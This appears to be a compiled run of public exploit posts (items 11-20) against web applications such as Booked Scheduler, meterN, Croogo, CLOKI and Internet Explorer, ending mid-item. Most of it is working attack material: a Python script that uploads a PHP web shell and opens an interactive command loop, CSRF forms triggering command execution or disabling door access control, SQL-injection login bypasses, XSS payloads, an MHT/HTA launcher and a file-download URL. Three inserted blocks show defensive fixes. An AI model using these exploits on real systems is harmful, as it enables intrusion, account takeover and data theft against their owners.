  11. # Exploit Title: WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 29/11/2021
# Exploit Author: Mansi Singh
# Vendor Homepage: https://wordpress.org/plugins/typebot/
# Software Link: https://wordpress.org/plugins/typebot/
# Tested on: Windows
# Reference: https://wpscan.com/vulnerability/2bde2030-2dfe-4dd3-afc1-36f7031a91ea

How to reproduce the vulnerability:

1. Install the latest WordPress.
2. Install and activate Typebot version 1.4.3.
3. Navigate to the Typebot settings and enter the payload into 'Publish ID or Full URL'.
4. Enter the JavaScript payload mentioned below:
   "><img src=x onerror=confirm(1)>
5. The payload is stored in the database; when the same functionality is triggered, the JavaScript payload executes and a pop-up appears.
  12. # Exploit Title: meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)
# Date: 18/11/2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.metern.org

<!--

meterN v1.2.3 Authenticated Remote Command Execution Vulnerability

Vendor: Jean-Marc Louviaux
Product web page: https://www.metern.org
Affected version: 1.2.3 and 0.8.3.2

Summary: meterN is a set of PHP/JS files that make up a home energy metering
and monitoring solution. It accepts any kind of meter: electrical, water, gas,
fuel consumption, solar or wind energy production, and so on. Sensors such as
temperature or humidity are also accepted. The philosophy is to keep it simple
and fast, with a low footprint, so that it runs on cheap, low-powered devices.

Desc: The application suffers from an authenticated OS command execution
vulnerability. This can be exploited to execute arbitrary commands through the
'COMMANDx' and 'LIVECOMMANDx' POST parameters in the admin_meter2.php and
admin_indicator2.php scripts. The application interface allows users to perform
these actions through HTTP requests without performing any validity checks to
verify the requests. This CSRF can be exploited to perform actions with
administrative privileges if a logged-in user visits a malicious web site.

---------------------------------------------------------------------------------------------------

/admin/admin_meter2.php:
------------------------

 69: if (!empty($_POST['COMMANDx']) && is_string($_POST['COMMANDx'])) {
 70:     $COMMANDx = htmlspecialchars($_POST['COMMANDx'], ENT_QUOTES, 'UTF-8');
 71: } else {
 72:     $COMMANDx = '';
 73: }
...
...
108: if (!empty($_POST['LIVECOMMANDx']) && is_string($_POST['LIVECOMMANDx'])) {
109:     $LIVECOMMANDx = htmlspecialchars($_POST['LIVECOMMANDx'], ENT_QUOTES, 'UTF-8');
110: } else {
111:     $LIVECOMMANDx = '';
112: }
...
...
271: exec("$COMMANDx 2>&1", $datareturn);
...
...
303: exec("$LIVECOMMANDx 2>&1", $datareturn);

---------------------------------------------------------------------------------------------------

Tested on: Apache/2.4.10 (Raspbian)
           Apache/2.4.46 (Win64)
           Linux 4.9.67-v7+ GNU/Linux (armv7l)
           Microsoft Windows 10 Home (10.0.19042 Build 19042)
           PHP/7.2.33

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5690
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5690.php

18.11.2021

-->

PoC #1:
-------

<html>
  <body>
    <form action="http://localhost/metern/admin/admin_indicator2.php" method="POST">
      <input type="hidden" name="NUMINDx" value="1" />
      <input type="hidden" name="INDNAMEx1" value="test" />
      <input type="hidden" name="IDx1" value="1" />
      <input type="hidden" name="COMMANDx1" value="calc" />
      <input type="hidden" name="bntsubmit1" value="Test&#32;command" />
      <input type="hidden" name="UNITx1" value="" />
      <input type="submit" value="Incongruity" />
    </form>
  </body>
</html>

PoC #2:
-------

<html>
  <body>
    <form action="http://localhost/metern/admin/admin_meter2.php" method="POST">
      <input type="hidden" name="METNAMEx" value="Conso" />
      <input type="hidden" name="COLORx" value="962629" />
      <input type="hidden" name="TYPEx" value="Elect" />
      <input type="hidden" name="PRODx" value="2" />
      <input type="hidden" name="PHASEx" value="1" />
      <input type="hidden" name="SKIPMONITORINGx" value="" />
      <input type="hidden" name="IDx" value="elect" />
      <input type="hidden" name="COMMANDx" value="houseenergy&#32;&#45;energy" />
      <input type="hidden" name="PASSOx" value="100000" />
      <input type="hidden" name="PRICEx" value="0&#46;23" />
      <input type="hidden" name="LIDx" value="elect" />
      <input type="hidden" name="LIVECOMMANDx" value="calc" />
      <input type="hidden" name="bntsubmit" value="Test&#32;live&#32;command" />
      <input type="hidden" name="EMAILx" value="" />
      <input type="hidden" name="WARNCONSODx" value="15000" />
      <input type="hidden" name="NORESPMx" value="true" />
      <input type="hidden" name="POAKEYx" value="" />
      <input type="hidden" name="POUKEYx" value="" />
      <input type="hidden" name="TLGRTOKx" value="" />
      <input type="hidden" name="TLGRCIDx" value="" />
      <input type="hidden" name="met&#95;numx" value="1" />
      <input type="submit" value="Incongruity" />
    </form>
  </body>
</html>
  13. # Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)
# Vulnerability founder: AkkuS
# Date: 13/12/2021
# Exploit Author: 0sunday
# Vendor Homepage: https://www.bookedscheduler.com/
# Software Link: N/A
# Version: Booked Scheduler 2.7.5
# Tested on: Kali 2021.2
# CVE: CVE-2019-9581

#!/usr/bin/python3
import sys
import requests
from random import randint


def login():
    login_payload = {
        "email": username,
        "password": password,
        "login": "submit",
        #"language": "en_us"
    }
    login_req = request.post(
        target + "/booked/Web/index.php",
        login_payload,
        verify=False,
        allow_redirects=True
    )
    if login_req.status_code == 200:
        print("[+] Logged in successfully.")
    else:
        print("[-] Wrong credentials !")
        exit()
    return login_req.text.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1]


def upload_shell(csrf):
    boundary = str(randint(123456789012345678901234567890, 999999999999999999999999999999))
    _headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
        "Accept-Language": "en-US,en;q=0.5",
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "multipart/form-data; boundary=---------------------------" + boundary,
        "Origin": target,
        "Connection": "close",
        "Referer": target + "/booked/Web/admin/manage_theme.php?update"
    }

    data = "-----------------------------" + boundary + "\r\n"
    data += "Content-Disposition: form-data; name=\"LOGO_FILE\"\r\n\n\n"
    data += "-----------------------------" + boundary + "\r\n"
    data += "Content-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"simple_shell.php\"\r\n"
    data += "Content-Type: application/x-php\r\n\n"
    data += "<?php $o = system($_REQUEST[\"cmd\"]);die?>\r\n\n"
    data += "-----------------------------" + boundary + "\r\n"
    data += "Content-Disposition: form-data; name=\"CSS_FILE\"\r\n\n\n"
    data += "-----------------------------" + boundary + "\r\n"
    data += "Content-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\n"
    data += csrf + "\r\n"
    data += "-----------------------------" + boundary + "--\r\n"

    # In case you need some debugging
    _proxies = {'http': 'http://127.0.0.1:8080'}

    upload_req = request.post(
        target + "/booked/Web/admin/manage_theme.php?action=update",
        headers=_headers,
        data=data
        #proxies=_proxies
    )


def shell():
    shell_req = request.get(target + "/booked/Web/custom-favicon.php")
    if shell_req.status_code == 200:
        print("[+] Uploaded shell successfully")
        print("[+] " + target + "/booked/Web/custom-favicon.php?cmd=")
    else:
        print("[-] Shell uploading failed")
        exit(1)
    print()
    cmd = ''
    while cmd != 'exit':
        cmd = input("$ ")
        shell_req = request.get(target + "/booked/Web/custom-favicon.php" + '?cmd=' + cmd)
        print(shell_req.text)


if len(sys.argv) != 4:
    print("[+] Usage : " + sys.argv[0] + " https://target:port username password")
    exit()

target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
request = requests.session()

csrf = login()
upload_shell(csrf)
shell()
  14. # Exploit Title: Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)
# Date: 13/12/2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.axesstmc.com/cloki/

<!--

Zucchetti Axess CLOKI Access Control 1.64 CSRF Disable Access Control

Vendor: Zucchetti Axess S.p.A.
Product web page: https://www.axesstmc.com
Affected version: 1.64
                  1.63
                  1.54

Summary: CLOKI is the pre-installed application on our terminals that provides
simple-to-use access control management and attendance monitoring using any
browser (IE, Chrome, Firefox, etc.). It is suited for anyone looking for a
stand-alone Access Control and Attendance Monitoring system where the users'
data is not frequently changed. Data management is simple and intuitive and no
additional software is needed on the PC intended for use as the web client.
CLOKI for Access Control also allows configuration and monitoring of access at
all company entrances (doors, gates, turnstiles etc). The Access Control manages
any type of reader, entrance and access credential. Using an impartial selector
it is possible to check that employees do not take company assets, and it
allows registration of all accesses to the system and all operations that users
carry out.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
These actions can be exploited to degrade authentication and change account
passwords with administrative privileges if a logged-in user visits a malicious
web site.

Tested on: Start X3 (h02 build 4163)
           Start X1 (g01 build 2804)
           X1/X2/X3/X4/X7 Web Server

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5689
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php

13.11.2021

-->

CSRF disable AC:
----------------

<html>
  <body>
    <form action="http://10.0.0.2:8081/redirect.cgi">
      <input type="hidden" name="flagAccessControlChanged" value="true" />
      <input type="hidden" name="RAct" value="5" />
      <input type="hidden" name="EnR" value="1" />
      <input type="hidden" name="ExR" value="1" />
      <input type="hidden" name="DenyRTout" value="5" />
      <input type="hidden" name="DenyR" value="0" />
      <input type="hidden" name="IType" value="0" />
      <input type="hidden" name="E485" value="on" />
      <input type="hidden" name="GType" value="0" />
      <input type="hidden" name="TOO" value="50" />
      <input type="hidden" name="TOC" value="50" />
      <input type="hidden" name="TOOE" value="100" />
      <input type="hidden" name="TOCE" value="100" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

CSRF enable AC:
---------------

<html>
  <body>
    <form action="http://10.0.0.2:8081/redirect.cgi">
      <input type="hidden" name="flagAccessControlChanged" value="true" />
      <input type="hidden" name="ACtrl" value="on" />
      <input type="hidden" name="RAct" value="5" />
      <input type="hidden" name="EnR" value="1" />
      <input type="hidden" name="ExR" value="1" />
      <input type="hidden" name="DenyRTout" value="5" />
      <input type="hidden" name="DenyR" value="0" />
      <input type="hidden" name="IType" value="0" />
      <input type="hidden" name="E485" value="on" />
      <input type="hidden" name="GType" value="0" />
      <input type="hidden" name="TOO" value="50" />
      <input type="hidden" name="TOC" value="50" />
      <input type="hidden" name="TOOE" value="100" />
      <input type="hidden" name="TOCE" value="100" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  15. # Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass
# Exploit Author: Yehia Elghaly (YME)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
# Version: Online Thesis Archiving System 1.0
# Tested on: Windows, xampp
# CVE: N/A

- Description: SQLi Authentication Bypass

An SQL injection vulnerability exists in Online Thesis Archiving System 1.0. An admin account takeover is possible with either of the payloads:

admin' #
admin' or '1'='1

PoC:

POST /otas/admin/login.php HTTP/1.1
Host: 192.168.113.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://192.168.113.130
DNT: 1
Connection: close
Referer: http://192.168.113.130/otas/admin/login.php
Cookie: PHPSESSID=0jsudph494kpt2a5jvbvdvsrsc
Upgrade-Insecure-Requests: 1

username=admin' #&password=admin' #

- Description: Stored Cross Site Scripting (XSS)

Stored Cross Site Scripting (XSS) exists in Online Thesis Archiving System 1.0.

Steps:
1- Go to (http://localhost/otas/admin/?page=departments) and (http://localhost/otas/admin/?page=curriculum)
2- Add a new (curriculum) or (department)
3- Insert your payload: <script>("xssyf")</script>
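The bypass above works because the login query is assembled by string concatenation, so the quote in the username closes the literal and the rest of the input becomes SQL. The example below is added here to show the vulnerable pattern beside its fix; it is not code from the Online Thesis Archiving System. It uses an in-memory SQLite table with constructed demo accounts, so the "admin' #" payload (a MySQL comment, a syntax error in SQLite) is not exercised, only the "admin' or '1'='1" form. The hardened login uses a parameterized query and compares a salted PBKDF2 hash in constant time instead of matching a plaintext password column.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed demo credentials (not from the original post).
DEMO_USERS = {"admin": "correct-horse", "alice": "battery-staple"}


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 200_000)


def build_db() -> sqlite3.Connection:
    """In-memory users table. The plaintext 'password' column exists only so
    the legacy, vulnerable query can be reproduced; the hardened login reads
    the salt and hash columns."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, "
        "password TEXT, salt BLOB, pw_hash BLOB)"
    )
    for username, password in DEMO_USERS.items():
        salt = os.urandom(16)
        conn.execute(
            "INSERT INTO users (username, password, salt, pw_hash) VALUES (?, ?, ?, ?)",
            (username, password, salt, hash_password(password, salt)),
        )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """String-built query in the style the advisory describes.
    Returns the matched username or None."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterized lookup by username, then constant-time hash comparison.
    The input is never interpreted as SQL, so the quote has no effect."""
    row = conn.execute(
        "SELECT username, salt, pw_hash FROM users WHERE username = ?",
        (username,),
    ).fetchone()
    if row is None:
        return None
    name, salt, stored = row
    if hmac.compare_digest(hash_password(password, salt), stored):
        return name
    return None


if __name__ == "__main__":
    db = build_db()
    payload = "admin' or '1'='1"
    print("vulnerable:", login_vulnerable(db, payload, "anything"))  # admin
    print("safe:      ", login_safe(db, payload, "anything"))        # None
```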
  16. # Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass
# Exploit Author: John Page (aka hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt
# twitter.com/hyp3rlinx
# ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Microsoft Internet Explorer (MSIE)

Internet Explorer is a discontinued series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.

[Vulnerability Type]
ActiveX Control Security Bypass

[CVE Reference]
N/A

[Security Issue]
Upon opening a specially crafted .MHT file on disk, Internet Explorer ActiveX control warnings as well as popup blocker privacy settings are not enforced. This can allow the execution of ActiveX content with zero warning to an unsuspecting end user, and/or force them to visit arbitrary attacker-controlled websites.

By default, when opening browser-associated files that contain active content, MSIE restricts scripts from running without explicit user interaction and permission. Instead, end users are presented with a yellow warning bar on the browser's webpage, asking first if they wish to allow the blocked content to run. This prevents execution of active content scripts or controls without the user first clicking the "Allow blocked content" warning bar.

However, specially crafted MHT files residing on disk that contain an invalid header directive suppress ActiveX warnings and popup blocker privacy settings. Therefore, to bypass Internet Explorer "active content" blocking, the file needs to contain a Content-Location header with an arbitrary value, e.g. "Content-Location: PBARBAR".

Note: MHT files are often set to open in IE by default, and while IE is discontinued it is still present on the Windows OS.

Tested successfully on Windows 10, latest fully patched version, with default IE security settings.

Expected result: ActiveX control security warning, prevention of code execution and blocking of browser popup windows.

Actual result: No ActiveX control code execution blocking, security warnings or browser window popup blocking enforcement.

[PoC Requirements]
The MHT file must reside on disk; think targeted attack scenarios.

[Exploit/POC]
Change the [VICTIM] value below to a specified user for testing.

1) Create the MHT PoC file "MSIE_ActiveX_Control_Security_Bypass.mht":

From:
Subject:
Date:
MIME-Version: 1.0
Content-Type: multipart/related; type="text/html"; boundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001"

This is a multi-part message in MIME format.

--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001
Content-Type: text/html; charset="UTF-8"
Content-Location: DOOM

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<script>
win=window
win.open("http://www.microsoft.com","","width=600,height=600")
var args = ['height='+1,'width='+1,].join(',')
setTimeout("", 3000)
var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv ________________________________________________________.hta', 'pop', args)
pop.moveTo(2000,2000)
</script>
</body>
</html>

--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--

2) Create the PoC HTA file "Sales_Report_2021.csv ________________________________________________________.hta":

<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
<script language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("calc.exe")
</script>

3) Open the MHT file locally.

[Network Access]
Local

[POC/Video URL]
https://www.youtube.com/watch?v=UCSqFbYUvBk

[Disclosure Timeline]
Vendor Notification: May 13, 2019
MSRC: July 2, 2019 "We determined that a fix for this issue will be considered in a future version of this product or service. At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case."
December 5, 2021: Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  17. # Exploit Title: Oliver Library Server v5 - Arbitrary File Download
# Date: 14/12/2021
# Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group
# Vendor Homepage: https://www.softlinkint.com/product/oliver/
# Product: Oliver Server v5
# Version: < 8.00.008.053
# Tested on: Windows Server 2016

Technical Description:
An arbitrary file download vulnerability in Oliver v5 Library Server versions < 8.00.008.053 via the FileServlet function allows an attacker to download arbitrary files, because user-supplied input is used unsanitized.

Steps to Exploit:
1) Use the following payload:
   https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path>
2) Example to download the iis.log file:
   https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log
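The FileServlet issue above is the classic shape of an arbitrary file download: a client-supplied fileName is joined onto a server directory (or used as-is) without checking where the result ends up. The example below is added to this thread and is not Oliver's code; it shows how a download handler should confine the request to one root. The directory layout and request strings are constructed. It rejects absolute paths, Windows drive letters and ".." segments under both POSIX and Windows path rules, and then re-checks the resolved path so a symlink inside the root cannot point back out.

```python
import tempfile
from pathlib import Path, PurePosixPath, PureWindowsPath


class PathTraversalError(ValueError):
    pass


def syntactically_unsafe(requested: str) -> bool:
    """Reject anything that is not a plain relative path: NUL bytes, absolute
    paths, Windows drive letters and '..' segments, checked under both POSIX
    and Windows path rules regardless of the host OS the check runs on."""
    if not requested or "\x00" in requested:
        return True
    for pure in (PurePosixPath(requested), PureWindowsPath(requested)):
        if pure.is_absolute() or pure.drive or ".." in pure.parts:
            return True
    return False


def resolve_download(base_dir: Path, requested: str) -> Path:
    """Map a client-supplied file name onto base_dir and refuse anything that
    resolves outside it (symlinks included, because resolve() follows them)."""
    if syntactically_unsafe(requested):
        raise PathTraversalError(requested)
    base = base_dir.resolve()
    candidate = (base / requested).resolve()
    if candidate != base and base not in candidate.parents:
        raise PathTraversalError(requested)
    if not candidate.is_file():
        raise FileNotFoundError(requested)
    return candidate


def run_demo() -> dict:
    """Constructed scenario: a download root with one legitimate file and four
    requests, three of which try to leave the root. Returns request -> verdict."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp) / "downloads"
        (base / "reports").mkdir(parents=True)
        (base / "reports" / "q1.csv").write_text("constructed,sample\n")
        requests_ = [
            "reports/q1.csv",        # legitimate
            "c:/windows/iis.log",    # the advisory's example, a drive-absolute path
            "../../etc/passwd",      # dot-dot traversal
            "/etc/passwd",           # POSIX absolute path
        ]
        results = {}
        for req in requests_:
            try:
                resolve_download(base, req)
                results[req] = "allowed"
            except PathTraversalError:
                results[req] = "rejected"
        return results


if __name__ == "__main__":
    for req, verdict in run_demo().items():
        print(f"{verdict:8} {req}")
```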
  18. # Exploit Title: Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration
# Date: 13/12/2021
# Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed
# Vendor Homepage: https://www.cybelesoft.com
# Software Link: https://www.cybelesoft.com/thinfinity/virtualui/
# Version: vulnerable < v3.0
# Tested on: Microsoft Windows
# CVE: CVE-2021-44848

How it works:
By accessing the vector, an attacker can determine whether a username exists thanks to the message returned; the message can be presented in different languages according to the configuration of VirtualUI. Common users are administrator, admin, guest...

Payload:
The vulnerable vector is "https://example.com/changePassword?username=USERNAME", where "USERNAME" needs to be guessed.

Reference:
https://github.com/cybelesoft/virtualui/issues/1
  19. # Exploit Title: Croogo 3.0.2 - Unrestricted File Upload
# Date: 06/12/2021
# Exploit Author: Enes Özeser
# Vendor Homepage: https://croogo.org/
# Software Link: https://downloads.croogo.org/v3.0.2.zip
# Version: 3.0.2
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3

==> 'setting-43' Unrestricted File Upload <==

1- Log in with your privileged account.
2- Click on the 'Settings' section.
3- Go to 'Themes'. The directory is '/admin/settings/settings/prefix/Theme'.
4- Choose a malicious PHP script and upload it.
5- Go to the '/uploads/(NAME).php' directory. Replace 'NAME' with the filename you uploaded.
6- The malicious PHP script will be executed.

POST /admin/settings/settings/prefix/Theme HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------360738881613175158033315978127
Content-Length: 970
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/settings/settings/prefix/Theme
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_method"

POST
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_csrfToken"

c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="setting-43"; filename="malicious.php"
Content-Type: application/octet-stream

<?php
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_Token[fields]"

c4e0a45b25b5eaf8fa6e0e4ddcd3be00c621b803%3A
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_Token[unlocked]"


-----------------------------360738881613175158033315978127--
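Both the Booked Scheduler favicon upload (item 13) and the Croogo theme upload above succeed for the same reason: the server trusts the client's filename and content type and drops the file where the web server will execute it. The validator below is an added example for this thread and is not code from either project. It accepts only an allowlisted image extension, requires the file's magic bytes to match that extension, refuses a PHP open tag anywhere in the body (catching image/PHP polyglots), and returns a random server-chosen storage name, which should be written into a directory the web server serves without executing. The sample filenames and byte strings are constructed.

```python
import os
import secrets

# Allowlisted extensions and the magic bytes a file of that type must start with.
MAGIC = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
    "ico": [b"\x00\x00\x01\x00"],
}


class UploadRejected(ValueError):
    pass


def validate_upload(filename: str, content: bytes) -> str:
    """Return a server-chosen storage name for an acceptable upload, or raise.

    Checks in order: the client name is name.ext with exactly one extension
    (so 'shell.php.png' is rejected rather than judged by its last part, since
    some web server configurations honour the inner extension), the extension
    is allowlisted, the content's magic bytes match that extension, and the
    body carries no PHP open tag. The returned name is random, so the uploader
    cannot predict the URL, and keeps only the validated extension."""
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base.startswith("."):
        raise UploadRejected("empty or hidden file name")
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        raise UploadRejected("file name must be name.ext with a single extension")
    ext = parts[1]
    if ext not in MAGIC:
        raise UploadRejected(f"extension .{ext} not allowed")
    if not any(content.startswith(magic) for magic in MAGIC[ext]):
        raise UploadRejected("content does not match the declared type")
    if b"<?php" in content or b"<?=" in content:
        raise UploadRejected("script open tag inside image body")
    return f"{secrets.token_hex(16)}.{ext}"


def check(filename: str, content: bytes) -> str:
    """Convenience wrapper: 'accepted' or 'rejected: <reason>'."""
    try:
        validate_upload(filename, content)
        return "accepted"
    except UploadRejected as exc:
        return f"rejected: {exc}"


# Constructed sample bodies (not from the original posts).
PNG_LOGO = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP_BODY = b"<?php echo 'constructed php body'; ?>"

if __name__ == "__main__":
    for name, body in [("logo.png", PNG_LOGO), ("simple_shell.php", PHP_BODY),
                       ("shell.php.png", PHP_BODY), ("polyglot.png", PNG_LOGO + PHP_BODY)]:
        print(f"{name:18} {check(name, body)}")
```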
  20. # Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 06/12/2021
# Exploit Author: Enes Özeser
# Vendor Homepage: https://croogo.org/
# Software Link: https://downloads.croogo.org/v3.0.2.zip
# Version: 3.0.2
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3

==> 'Content-Type' Stored Cross-Site Scripting (/admin/file-manager/attachments/add) <==

POST /admin/file-manager/attachments/add HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------114221148012003093972656004730
Content-Length: 923
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/file-manager/attachments/add
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_method"

POST
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_csrfToken"

c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="file"; filename="file.txt"
Content-Type: <script>alert(document.cookie)</script>

Enes Ozeser (@enesozeser)
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_Token[fields]"

16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_Token[unlocked]"


-----------------------------114221148012003093972656004730--

==> 'title' Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <==

POST /admin/taxonomy/types/edit/5 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 590
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/taxonomy/types/edit/5
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&title=<script>alert(document.cookie)</script>&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0&comment_approve=1&comment_spam_protection=0&comment_captcha=0&params=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1&format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_apply

==> 'title' Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <==

